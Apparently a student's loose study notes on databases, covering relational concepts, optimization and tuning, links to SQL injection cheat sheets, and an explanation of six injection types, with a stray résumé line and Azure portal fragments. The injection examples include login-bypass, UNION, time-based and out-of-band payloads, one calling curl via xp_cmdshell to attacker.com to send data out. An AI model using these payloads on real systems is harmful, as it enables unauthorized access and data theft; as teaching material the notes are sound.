Database

A database is a repository, where one or more users can save, update and retrieve
information according to their requirements.

Relational database
A relational database (RDB) is a way of structuring information in tables, rows,
and columns. An RDB has the ability to establish links—or relationships–between
information by joining tables, which makes it easy to understand and gain insights
about the relationship between various data points.

A relational database is a way to store and access data with pre-defined

relationships.

RDBMS
A relational database management system is a software layer of tools and services
that manages relational tables.

SQL
Structure Query Language is a powerful and popular language for manipulating data
in relational databases.

Database Security
Users and Permissions
SQL Injection Prevention
Encryption

SQL Injections cheet sheets

slides.com/christophe-cybr/sql-explained

Getting started finding a vulnerable parameter:

https://github.com/AdmiralGaust/SQL-Injection-cheat-sheet
Master list:
https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
General list:
https://portswigger.net/web-security/sql-injection/cheat-sheet
UNION attacks
https://portswigger.net/web-security/sql-injection/union-attacks
Info gathering:
https://portswigger.net/web-security/sql-injection/examining-the-database
Blind injections:
https://portswigger.net/web-security/sql-injection/blind
General SQL tips & tricks:
https://sqlzoo.net/
Juice Shop hints:
https://bkimminich.gitbooks.io/pwning-owasp-juice-shop/part2/injection.html

Database Optimization
Database optimization generally refers to the process of designing and structuring
a database to ensure it operates efficiently and effectively from the start. It
focuses on:

Schema Design: Creating a database schema that avoids redundancy and ensures data
integrity. This involves normalization (organizing data to reduce redundancy) and
choosing appropriate data types.
Indexing: Deciding which columns to index to speed up query performance. Proper
indexing helps in retrieving data quickly and efficiently.

Data Modeling: Designing the database structure and relationships between tables to
optimize performance and scalability.

Choosing Storage: Selecting the appropriate storage engines or formats based on the
needs of the application (e.g., InnoDB vs. MyISAM in MySQL).

Database Tuning
Database tuning involves adjusting and configuring the database and its environment
to improve performance. This is more about fine-tuning existing databases and
includes:

Query Optimization: Analyzing and modifying queries to run more efficiently. This
may involve rewriting queries, using better indexing strategies, or avoiding
complex joins and subqueries.

Configuration Settings: Adjusting database server settings (such as buffer sizes,

cache configurations, and connection limits) to better match the workload and
hardware.

Resource Allocation: Managing and allocating resources like CPU, memory, and disk
I/O to ensure the database performs optimally under various loads.

Monitoring and Profiling: Continuously monitoring database performance metrics and

using profiling tools to identify bottlenecks and areas for improvement.

Maintaining Statistics: Keeping statistics up-to-date for the query optimizer to

make informed decisions about query execution plans.

Summary
Database Optimization is about designing and setting up the database structure and
schema to ensure efficient performance from the start.
Database Tuning is about adjusting and configuring the database and its environment
to enhance performance based on current usage patterns and workloads.

1. Classic SQL Injection

Classic SQL Injection occurs when an attacker inserts or "injects" malicious SQL
code into a query. This is typically achieved through input fields like search
boxes or login forms.

Example: If a login form uses a query like:

sql
Copy code
SELECT * FROM Users WHERE Username = 'user_input' AND Password = 'password_input';
An attacker might input ' OR '1'='1' for both fields, potentially allowing
unauthorized access.

2. Blind SQL Injection

Blind SQL Injection is a type where the attacker does not receive error messages or
direct feedback from the application. Instead, they infer information based on the
application's behavior.

Types of Blind SQL Injection:

Boolean-Based Blind SQL Injection: The attacker sends queries that ask the database
to return true or false based on certain conditions. For example, checking if the
first letter of the username is 'A':

sql
Copy code
SELECT * FROM Users WHERE Username = 'user_input' AND 'A' = SUBSTRING(Username, 1,
1);
The application's response will reveal if the condition is true or false.

Time-Based Blind SQL Injection: The attacker sends queries that cause the database
to wait for a specified period before responding. For example:

sql
Copy code
SELECT * FROM Users WHERE Username = 'user_input' AND IF(1=1, SLEEP(5), 0);
The delay in the application's response indicates whether the condition was true.

3. Error-Based SQL Injection

Error-Based SQL Injection exploits error messages returned by the database server.
By causing errors in the SQL query, attackers can gather information about the
database structure and content.

Example: If the database returns an error message that includes the structure of
the database, attackers can use this information to craft further attacks:

sql
Copy code
SELECT * FROM Users WHERE Username = 'user_input' AND 1=CONVERT(int, 'string');
This might produce an error revealing details about the database schema.

4. Union-Based SQL Injection

Union-Based SQL Injection uses the UNION SQL operator to combine the results of the
original query with results from one or more additional queries. This can be used
to extract data from other tables.

Example: Suppose the original query is:

sql
Copy code
SELECT Name, Age FROM Users WHERE ID = 'user_input';
An attacker might inject:

sql
Copy code
' UNION SELECT username, password FROM Admins--
This could combine the results of the original query with data from the Admins
table.

5. Out-of-Band SQL Injection

Out-of-Band SQL Injection is used when the attacker cannot use the same channel for
sending data and receiving results. Instead, they use an out-of-band channel, such
as making the database server perform actions like sending DNS requests or HTTP
requests to the attacker’s server.

Example: An attacker might inject:

sql
Copy code
SELECT * FROM Users WHERE Username = 'user_input'; EXEC xp_cmdshell('curl
http://attacker.com/collect?data=' + @@version);
If the server supports xp_cmdshell, it could make an HTTP request to the attacker's
server, potentially exfiltrating data.

6. Second-Order SQL Injection

Second-Order SQL Injection occurs when the malicious input is stored by the
application and later used in a SQL query. This is a form of SQL injection where
the attack does not immediately manifest but instead triggers when the stored input
is later retrieved and processed.

Example: An attacker might input a malicious payload into a profile field. The
payload might not cause an issue initially but could lead to an attack when the
profile information is later used in a query.

Senior SQL Server Developer with 10+ years of experience in professional

application and database development with thorough knowledge of different phases of
the software development lifecycle including analysis, design, development,
documentation, Testing, deployment and system support. Hands-on experience of
designing relational databases, ensuring data integrity, normalization and
security.

Test (imsami/Test)
SQL database
7 minutes ago
DBData
Resource group
8 minutes ago
imsami
SQL server
47 minutes ago
Azure subscription 1

Subscription
------------------
A subscription in Azure is a container that holds a collection of connected
business or technical resources. The resources are used and billed as a group.
Multiple subscriptions with various access management policies and invoicing
procedures can be added to an Azure account.

A resource group is a container that holds related resources for an Azure solution.
The resource group can include all the resources for the solution, or only those
resources that you want to manage as a group.